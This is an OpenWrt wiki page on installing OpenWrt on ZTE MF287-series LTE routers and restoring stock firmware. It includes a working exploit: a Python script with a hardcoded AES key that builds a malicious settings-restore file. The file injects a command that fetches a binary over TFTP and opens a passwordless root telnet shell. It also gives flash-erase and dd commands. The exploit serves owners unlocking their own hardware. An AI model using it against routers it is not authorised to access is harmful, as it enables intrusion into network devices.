ZTE MF287

The ZTE MF287 series is a range of LTE routers by ZTE made for the network operator “3”. The devices share a lot of features and functionalities with other ZTE devices, like the MF286, MF289 or MF282 series.

There are three known variants:

  • ZTE MF287
  • ZTE MF287+
  • ZTE MF287Pro

The MF287 and MF287+ have a very similar board but feature a different LTE module while the ZTE MF287Pro has a completely different mainboard and again a different modem.

You need an exploit to get access to the stock firmware. Prepare the following:

  • TFTP server - tftpd-hpa on Linux is tested, but tftpd32 should work as well
  • Static build of busybox for ARM, e.g. from https://busybox.net/downloads/binaries/1.21.1/ (Pick ARMV7 version)
  • Rename busybox to “telnetd” and put it to your TFTP root directory
  • Download the exploit.dat from https://cloud.aboehler.at/index.php/s/GDixspLf4jgg8pT. Please use the password nzjmaBARoM
  • Put the OpenWrt factory.bin file to your TFTP directory as zte.bin
  • Assign your computer the IP address 192.168.0.22

Now you can actually exploit the web interface and get access via Telnet.

  1. Log in to the web interface of your router, go to settings restore and use the file “exploit.dat” as the file to restore. Accept the message that the router is going to be restarted - don't worry, it won't restart.
  2. Watch your TFTP server serving the file “telnetd”
  3. Use a Telnet client and connect to 192.168.0.1 on port 10023
  4. You should be logged in immediately, no password required
  5. Execute the following commands to take a backup and to install OpenWrt (NB: Instead of using tftp, you should also be able to use scp from the router):

For the MF287Pro, you need to replace mtd13 with mtd17 and mtdblock13 with mtdblock17!

Please double-check the partition number by running cat /proc/mtd and looking for the line named rootfs. Use this mtd number.

cd /tmp
cat /dev/ubi0_0 > /tmp/ubi0_0
cat /dev/ubi0_1 > /tmp/ubi0_1
tftp -p -l /tmp/ubi0_0 -r ubi0_0 192.168.0.22
tftp -p -l /tmp/ubi0_1 -r ubi0_1 192.168.0.22
rm /tmp/ubi0*
tftp -g -r zte.bin 192.168.0.22
cat /proc/driver/sensor_id
flash_erase /dev/mtd13 0 0
dd if=zte.bin of=/dev/mtdblock13 bs=131072
reboot

After the Reboot, OpenWrt is installed!

This method requires disassembly and serial access. The following pictures and instructions detail this process:

  • Remove the battery cover and unscrew four screws at the bottom
  • Remove the four white rubber covers on the back and remove the screws
  • Pry open the back cover (where all the LAN ports are)
  • Remove four screws; two can be seen on the top, two are at the bottom. Once they are removed, you can slide-out the main board
  • Remove two more screws holding the antenna at the back in place
  • Beneath the antenna, the UART pins can be found
  • Connect serial console with 115200 8N1 and start a terminal program

You need the two files ubi0_0 and ubi0_1 you downloaded during the installation of OpenWrt. If you are already running OpenWrt, you need to flash an initramfs version first - for this, simply install the -recovery.bin version using sysupgrade as usual.

Once rebooted, transfer the files ubi0_0 and ubi0_1 to your router to /tmp. Then, run the following commands to restore back to stock - the “ls” command is used to get the sizes of kernel and rootfs. Replace $kernel_length by the value you got for ubi0_0 and $rootfs_size by the value you got for ubi0_1.

Please double-check the partition number by running cat /proc/mtd and looking for the line named rootfs. Use this mtd number. For the MF287Pro, this should be ubiattach -m 14 with ubiattach -m 17.

ls -l /tmp/ubi0*
ubiattach -m 14
ubirmvol /dev/ubi0 -N kernel
ubirmvol /dev/ubi0 -N rootfs
ubirmvol /dev/ubi0 -N rootfs_data
ubimkvol /dev/ubi0 -N kernel -s $kernel_length
ubimkvol /dev/ubi0 -N ubi_rootfs -s $rootfs_size
ubiupdatevol /dev/ubi0_0 /tmp/ubi0_0
ubiupdatevol /dev/ubi0_1 /tmp/ubi0_1
reboot

The system should reboot into the stock firmware.

The settings file of the MF287+ is obfuscated and encrypted. Fortunately, the algorithm isn't very complicated and could be easily decompiled using Ghidra. The following Python script creates the “exploit.dat” file as linked to above:

  1. #!/usr/bin/env python
  2.  
  3. import os
  4. import sys
  5. import subprocess
  6. import tempfile
  7. import struct
  8. import shutil
  9. import hashlib
  10.  
  11. class TelnetEnabler(object):
  12. def __init__(self, filepath, directory):
  13. self.openssl = None
  14. self.filepath = filepath
  15. self.directory = directory
  16. self.check_openssl()
  17.  
  18. def decrypt_file(self):
  19. if os.path.exists(self.filepath):
  20. print(f"Output file already exists: {self.filepath}")
  21. return False
  22.  
  23. exploit = ";zte_debug.sh 192.168.0.22 telnetd; /tmp/telnetd -l /bin/sh -p 10023; sleep 3600\n"
  24. out = bytearray()
  25. for char in exploit:
  26. if char != '\n' or char != '\t' or char != '\0':
  27. out.append(ord(char) ^ 0x1f)
  28. else:
  29. out.append(ord(char))
  30. fp = open(self.directory + os.path.sep + "decrypted.txt", "wb")
  31. fp.write(out)
  32. fp.close()
  33.  
  34. ret = subprocess.run([self.openssl, "enc", "-aes-128-cbc", "-out", self.filepath, "-in", self.directory + os.path.sep + "decrypted.txt", "-pass", "pass:DA69C84B145A11040DBF6363C136DC71", "-md", "md5"])
  35. if ret.returncode != 0:
  36. print("Error encrypting file")
  37. return False
  38.  
  39.  
  40.  
  41. def which(self, program):
  42. def is_exe(fpath):
  43. return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
  44.  
  45. fpath, fname = os.path.split(program)
  46. if fpath:
  47. if is_exe(program):
  48. return program
  49. else:
  50. for path in os.environ["PATH"].split(os.pathsep):
  51. path = path.strip('"')
  52. exe_file = os.path.join(path, program)
  53. if is_exe(exe_file):
  54. return exe_file
  55.  
  56. return None
  57.  
  58. def check_openssl(self):
  59. self.openssl = self.which("openssl")
  60. if self.openssl:
  61. ret = subprocess.run([self.openssl, "version"], stdout = subprocess.PIPE,
  62. universal_newlines = True)
  63. if ret.returncode == 0:
  64. version = ret.stdout.replace('\n', '')
  65. return version
  66.  
  67. return False
  68.  
  69. if len(sys.argv) < 2:
  70. print("Usage: exploit.py configure.bin")
  71. sys.exit(1)
  72.  
  73. with tempfile.TemporaryDirectory() as tempdir:
  74. enabler = TelnetEnabler(sys.argv[1], tempdir)
  75. enabler.decrypt_file()

---- datatemplatelist dttpllist ---- template: meta:template_datatemplatelist cols : Brand, Model, Versions, Device Type, Availability, Supported Since Commit_git, Supported since Rel, Supported current Rel, Unsupported, Bootloader, CPU, Target, CPU MHz, Flash MBs, RAM MB, Switch, Ethernet 100M ports_, Ethernet Gbit ports_, Comments network ports_, Modem, VLAN, WLAN 2.4GHz, WLAN 5.0GHz, WLAN Hardwares, WLAN Comments_, Detachable Antennas_, USB ports_, SATA ports_, Comments USB SATA ports_, Serial, JTAG, LED count, Button count, Power supply, Device Techdata_pageid, Forum topic URL_url, wikidevi URL_url, OEM Device Homepage URL_url, Firmware OEM Stock URL_url, Firmware OpenWrt Install URL_url, Firmware OpenWrt Upgrade URL_url, Comments_ filter : Brand=ZTE filter : Model=MF287Pro


This website uses cookies. By using the website, you agree with storing cookies on your computer. Also you acknowledge that you have read and understand our Privacy Policy. If you do not agree leave the website.More information about cookies
  • Last modified: 2024/03/10 19:06
  • by andyboeh